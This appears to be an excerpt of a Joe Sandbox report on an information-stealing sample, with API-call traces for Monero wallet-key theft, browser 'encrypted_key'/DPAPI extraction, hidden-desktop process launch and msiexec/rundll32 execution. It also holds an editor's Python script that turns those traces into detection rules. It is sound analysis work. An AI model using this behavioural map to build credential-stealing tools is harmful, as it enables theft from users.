                                            • Instruction ID: ddde458db509fa4dae7f053a195c0891e23f7e119e901a7725825684021af676
                                            • Opcode Fuzzy Hash: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                            • Instruction Fuzzy Hash: D4517FB1904318ABDB24DB61CC89FE97779AF48700F004599F60DAA2D0EBB59B88CF55
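The three listings above (the lstrcatA chain at 00409C48..00409D0D that assembles ws://localhost:9229, cookies and .txt; the CreateFileA/ReadFile/StrStrA/CryptStringToBinaryA function at 0040CB6C; and the CreateDesktopA/CreateProcessA/Sleep/CloseDesktop function at 0245A133) are the kind of API sequences an analyst turns into triage rules over a report like this one. The Python below is an added example written by the editor; it is not part of the Joe Sandbox report, not Joe Sandbox code and not the sample's code. It parses the report's `• api.MODULE(args), ref: addr` lines into per-function call sequences and evaluates three rules over them. The excerpt embedded in the block is copied from the listings above with long argument lists shortened. The readings behind the rules (a DevTools websocket endpoint on localhost concatenated with a `cookies` fragment; a base64 decode via CryptStringToBinaryA of something located by StrStrA inside a file that was just read in full; a child process started with CREATE_NO_WINDOW right after a desktop was created) and the CREATE_NO_WINDOW constant are the editor's assumptions taken from the Win32 documentation, not statements the report makes.

```python
"""Parse Joe Sandbox "APIs" listings and score them with three behavioural rules.

Added example by the editor; not part of the report, of Joe Sandbox or of the sample.
The rule interpretations and the Win32 constant are assumptions (Win32 docs)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt: three functions from the listings above, in the report's own
# notation, with the longer argument lists shortened.
REPORT_EXCERPT = """\
APIs
  • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
• memset.MSVCRT ref: 00409C33
• lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
• lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
• lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
APIs
  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
• CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040CB6C
• ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
• StrStrA.SHLWAPI(?,009D00A8,00420B56), ref: 0040CBF7
  • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
• CloseHandle.KERNEL32(00000000), ref: 0040CF9C
Strings
Memory Dump Source
APIs
• CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0245A133
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0245A26B
• Sleep.KERNEL32(00001388), ref: 0245A27A
• CloseDesktop.USER32(00000000), ref: 0245A2C7
"""

# One report line: optional "Part of subcall function XXXXXXXX:" prefix, api.MODULE,
# optional "(args)", then "ref: XXXXXXXX". Lines like "memset.MSVCRT ref: ..." have no args.
CALL_RE = re.compile(
    r"^[•*]\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<api>[\w?@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})\s*$"
)
CREATE_NO_WINDOW = 0x08000000  # CreateProcess dwCreationFlags bit (assumed from Win32 docs)


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall: Optional[str]  # callee address when the line reads "Part of subcall function"


@dataclass
class Func:
    calls: List[Call] = field(default_factory=list)

    def ident(self) -> str:
        """Ref of the function's own first call (subcall lines belong to callees)."""
        own = [c for c in self.calls if c.subcall is None]
        return (own or self.calls)[0].ref

    def names(self) -> List[str]:
        return [c.api for c in self.calls]

    def strings(self) -> List[str]:
        return [a for c in self.calls for a in c.args]


def parse(text: str) -> List[Func]:
    """One Func per 'APIs' header; headers such as 'Strings' are skipped."""
    funcs: List[Func] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            funcs.append(Func())
            continue
        m = CALL_RE.match(line)
        if not m or not funcs:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        funcs[-1].calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return funcs


def hex_arg(call: Call, index: int) -> Optional[int]:
    """Argument `index` as an int, or None when the plugin printed '?' or a non-hex literal."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def in_order(names: List[str], pattern: List[str]) -> bool:
    """True when every name in `pattern` occurs in `names` in that order, gaps allowed."""
    it = iter(names)
    return all(any(n == want for n in it) for want in pattern)


def rule_devtools_cookie_path(f: Func) -> bool:
    # A localhost DevTools websocket endpoint and a "cookies" fragment built in one function.
    s = f.strings()
    return any(a.startswith("ws://localhost:") for a in s) and ("cookies" in s or "/devtools" in s)


def rule_read_file_then_base64(f: Func) -> bool:
    # Open, read, locate a substring, then base64-decode (CryptStringToBinaryA) what was found.
    return in_order(f.names(), ["CreateFileA", "ReadFile", "StrStrA", "CryptStringToBinaryA"])


def rule_hidden_desktop_process(f: Func) -> bool:
    # A desktop is created, then a child is started with CREATE_NO_WINDOW (dwCreationFlags, arg 6).
    if not in_order(f.names(), ["CreateDesktopA", "CreateProcessA"]):
        return False
    return any(c.api == "CreateProcessA" and (hex_arg(c, 5) or 0) & CREATE_NO_WINDOW for c in f.calls)


RULES = {
    "devtools_cookie_path": rule_devtools_cookie_path,
    "read_file_then_base64": rule_read_file_then_base64,
    "hidden_desktop_process": rule_hidden_desktop_process,
}


def evaluate(text: str) -> dict:
    """Map each rule name to the idents of the functions it matched."""
    hits = {name: [] for name in RULES}
    for f in parse(text):
        if not f.calls:
            continue
        for name, rule in RULES.items():
            if rule(f):
                hits[name].append(f.ident())
    return hits


if __name__ == "__main__":
    for name, refs in evaluate(REPORT_EXCERPT).items():
        print(f"{name:24s} {', '.join(refs) or '-'}")
```

The rules match on call order and on arguments the plugin printed as literals; an argument shown as `?` was not resolved by the plugin and is treated as unknown rather than as a match, which is why the desktop rule reads dwCreationFlags instead of the `?` command line, and why the DevTools rule keys on the string constants rather than on the unresolved buffer.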
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • RegOpenKeyExA.ADVAPI32(00000000,009CE348,00000000,00020019,00000000,004205BE), ref: 00418534
                                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                            • wsprintfA.USER32 ref: 004185E9
                                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                            • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                            • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                                            • String ID: - $%s\%s$?
                                            • API String ID: 3246050789-3278919252
                                            • Opcode ID: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                            • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                            • Opcode Fuzzy Hash: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                            • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID: `dAF$`dAF$image/jpeg
                                            • API String ID: 2244384528-2462684518
                                            • Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                            • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                            • Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                            • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                            APIs
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                              • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,009D1ED0), ref: 00406353
                                              • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                              • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,009D1218,00000000,00000000,00400100,00000000), ref: 004063D5
                                              • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                              • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                            • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                              • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                            • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                            • strtok.MSVCRT(00000000,?), ref: 004155EE
                                            • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                            • API String ID: 3532888709-2643084821
                                            • Opcode ID: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                            • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                            • Opcode Fuzzy Hash: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                            • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                            APIs
                                            • strtok_s.MSVCRT ref: 00411557
                                            • strtok_s.MSVCRT ref: 004119A0
                                              • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009C9490,?,004210F4,?,00000000), ref: 0041AB3B
                                              • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strtok_s$lstrcpylstrlen
                                            • String ID:
                                            • API String ID: 348468850-0
                                            • Opcode ID: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                            • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                            • Opcode Fuzzy Hash: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                            • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                            APIs
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExecuteShell$lstrcpy
                                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                            • API String ID: 2507796910-3625054190
                                            • Opcode ID: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                            • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                            • Opcode Fuzzy Hash: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                            • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                            APIs
                                            • memset.MSVCRT ref: 004144EE
                                            • memset.MSVCRT ref: 00414505
                                              • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                            • lstrcatA.KERNEL32(?,009D0750), ref: 0041455B
                                            • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                            • lstrcatA.KERNEL32(?,009D0510), ref: 00414583
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                              • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                              • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                            • StrStrA.SHLWAPI(?,009D0708), ref: 00414643
                                            • GlobalFree.KERNEL32(?), ref: 00414762
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                              • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                              • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                              • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                              • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                            • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                            • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                            • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                            • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                            • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                            • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                            • Opcode Fuzzy Hash: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                            • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                            APIs
                                            • memset.MSVCRT ref: 02464755
                                            • memset.MSVCRT ref: 0246476C
                                              • Part of subcall function 024691D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02469202
                                            • lstrcat.KERNEL32(?,00000000), ref: 024647A3
                                            • lstrcat.KERNEL32(?,006D6D0C), ref: 024647C2
                                            • lstrcat.KERNEL32(?,?), ref: 024647D6
                                            • lstrcat.KERNEL32(?,006D6FD8), ref: 024647EA
                                              • Part of subcall function 0246ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0246ACFF
                                              • Part of subcall function 02469187: GetFileAttributesA.KERNEL32(00000000,?,02451DFB,?,?,00425784,?,?,00420E22), ref: 02469196
                                              • Part of subcall function 0245A697: StrStrA.SHLWAPI(00000000,00421360), ref: 0245A6F0
                                              • Part of subcall function 0245A697: memcmp.MSVCRT(?,00421244,00000005), ref: 0245A749
                                              • Part of subcall function 0245A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0245A3A3
                                              • Part of subcall function 0245A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0245A3C8
                                              • Part of subcall function 0245A377: LocalAlloc.KERNEL32(00000040,?), ref: 0245A3E8
                                              • Part of subcall function 0245A377: ReadFile.KERNEL32(000000FF,?,00000000,024516F6,00000000), ref: 0245A411
                                              • Part of subcall function 0245A377: LocalFree.KERNEL32(024516F6), ref: 0245A447
                                              • Part of subcall function 0245A377: CloseHandle.KERNEL32(000000FF), ref: 0245A451
                                              • Part of subcall function 024697B7: GlobalAlloc.KERNEL32(00000000,02464894,02464894), ref: 024697CA
                                            • StrStrA.SHLWAPI(?,006D6AD8), ref: 024648AA
                                            • GlobalFree.KERNEL32(?), ref: 024649C9
                                              • Part of subcall function 0245A477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,024551A5,00000000,00000000), ref: 0245A4A6
                                              • Part of subcall function 0245A477: LocalAlloc.KERNEL32(00000040,?,?,?,024551A5,00000000,?), ref: 0245A4B8
                                              • Part of subcall function 0245A477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,024551A5,00000000,00000000), ref: 0245A4E1
                                              • Part of subcall function 0245A477: LocalFree.KERNEL32(?,?,?,?,024551A5,00000000,?), ref: 0245A4F6
                                              • Part of subcall function 0245A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0245A7E4
                                            • lstrcat.KERNEL32(?,00000000), ref: 0246495A
                                            • StrCmpCA.SHLWAPI(?,004208D2), ref: 02464977
                                            • lstrcat.KERNEL32(00000000,00000000), ref: 02464989
                                            • lstrcat.KERNEL32(00000000,?), ref: 0246499C
                                            • lstrcat.KERNEL32(00000000,00420FA0), ref: 024649AB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2450000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                            • String ID:
                                            • API String ID: 1191620704-0
                                            • Opcode ID: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                            • Instruction ID: 317909ef4ff12c80718752a33e9ff83473c145114552e4e5c71ac29af9629149
                                            • Opcode Fuzzy Hash: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                            • Instruction Fuzzy Hash: D27145B1D00218ABDB14EBB1DC49FEE777AAF48300F04459EE605A6190EB75DB48CF51
                                            APIs
                                            • memset.MSVCRT ref: 00401327
                                              • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                              • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                              • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                              • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                              • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                            • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                            • lstrlenA.KERNEL32(?), ref: 0040135C
                                            • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                              • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                              • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                              • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,009CBD38,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                              • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                              • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                              • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                              • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                              • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                              • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                              • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                              • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                            • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                            • memset.MSVCRT ref: 00401516
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_XJQkTVvJ3I.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                            • API String ID: 1930502592-218353709
                                            • Opcode ID: 5cbd2ce6e892b1f0c83a61596e34b7d956a3390dad6b1351db3e395e1cef7939
                                            • Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
                                            • Opcode Fuzzy Hash: 5cbd2ce6e892b1f0c83a61596e34b7d956a3390dad6b1351db3e395e1cef7939
                                            • Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                            • HeapAlloc.KERNEL32(00000000), ref: 00405021
                                            • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                            • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                            • memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
                                            • InternetCloseHandle.WININET(+aA), ref: 00405109
                                            • InternetCloseHandle.WININET(?), ref: 00405116
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000000.00000002.1929017160.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                             • Associated: 00000000.00000002.1929017160.000000000056E000.00000040.00000001.01000000.00000003.sdmp
